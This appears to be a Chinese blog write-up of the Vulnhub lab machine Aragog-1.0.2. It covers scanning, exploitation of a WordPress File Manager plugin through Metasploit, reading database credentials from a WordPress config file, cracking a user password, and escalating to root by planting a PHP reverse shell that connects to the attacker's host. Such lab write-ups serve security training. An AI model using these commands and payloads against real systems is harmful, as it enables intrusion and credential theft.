【Vulnhub】之Aragog-1.0.2

11 篇文章 0 订阅
9 篇文章 2 订阅

一、 部署方法

  1. 在官网上下载靶机ova环境:https://download.vulnhub.com/harrypotter/Aragog-1.0.2.ova
  2. 使用VMware搭建靶机环境
  3. 攻击机使用VMware上搭建的kali
  4. 靶机和攻击机之间使用NAT模式,保证靶机和攻击机放置于同一网段中。

二、 靶机下载安装

靶机下载与安装参考之前文章:搭建Vulnhub靶机详细步骤

三、渗透测试

1. 信息收集

arp-scan -l

扫描网段信息

在这里插入图片描述

发现靶机IP:192.168.15.135

使用 nmap 对靶机IP进行深度扫描

nmap -A -T4 -p- 192.168.15.135

在这里插入图片描述

nmap扫描发现靶机对外开放了22和80端口,浏览器去访问下web服务

在这里插入图片描述

发现只有一张图片,再使用 dirsearch 尝试扫描下网站目录

dirsearch -u 192.168.15.135

在这里插入图片描述

浏览器访问下扫描出来可访问的网站目录

在这里插入图片描述
在这里插入图片描述

点击Blog发现跳转到了wordpress.aragog.hogwarts

在这里插入图片描述

我们在hosts文件中添加域名解析:192.168.15.135 wordpress.aragog.hogwarts

vi /etc/hosts

在这里插入图片描述

保存退出后,重新载入发现可以正常访问到页面

在这里插入图片描述

浏览了下页面,发现没有可利用的点,但是我们能发现这个站点是利用wordpress搭建的

接下来我们使用wpscan枚举一下(ps:wpscan是一个扫描WordPress漏洞的扫描器)

去注册个免费的账号获取api-token:https://wpscan.com/(需要翻墙,否则无法注册)

wpscan --api-token=获取到的免费api-token --url=http://192.168.15.135/blog -e p --plugins-detection aggressive

在这里插入图片描述

扫描到3个File Manager的漏洞

2. 漏洞利用

使用msf进行漏洞利用

msfconsole                       #启动msf
search file manager wordpress    #查找漏洞相关exp
use 1                            #使用第1个exp
show options                     #查看需要设置的参数
set RHOSTS 192.168.15.135        #设置靶机IP
set TARGETURI /blog              #设置路径
set LHOST 192.168.15.131         #设置攻击IP
run                              #启动攻击

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

成功获取到shell

3. 提权

为方便操作,首先使用python打开交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件里,查看后发现了数据库的root密码

在这里插入图片描述

使用root密码连接数据库,我们在wordpress数据库下,wp_users表中查到一条登录记录

mysql -u root -p         #连接数据库
show databases;          #查看所有数据库
use wordpress;          #使用wordpress数据库
show tables;            #查看wordpress数据库中所有表
select * from wp_users;  #查看wp_users表内容

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

解密后我们得到了hagrid98账户的密码:password123

在这里插入图片描述

尝试ssh登录

ssh hagrid98@192.168.15.135

在这里插入图片描述

成功登录,并在当前目录下发现了第一个魂器

在这里插入图片描述

继续查看目录文件,我们在/opt目录下发现一个隐藏的脚本文件:.backup.sh

在这里插入图片描述

查看脚本文件内容是将上传的文件复制到tmp目录里,应该是定时执行

所以我们到目录/tmp下写一个反弹shell的php脚本,然后修改.backup.sh脚本内容

<?php $sock=fsockopen("192.168.15.131",7777);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

在这里插入图片描述

在kali中开启7777端口监听

nc -lnvp 7777

在这里插入图片描述

等待片刻,成功获取到root权限,并在root目录下发现了第二个魂器

在这里插入图片描述
完!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值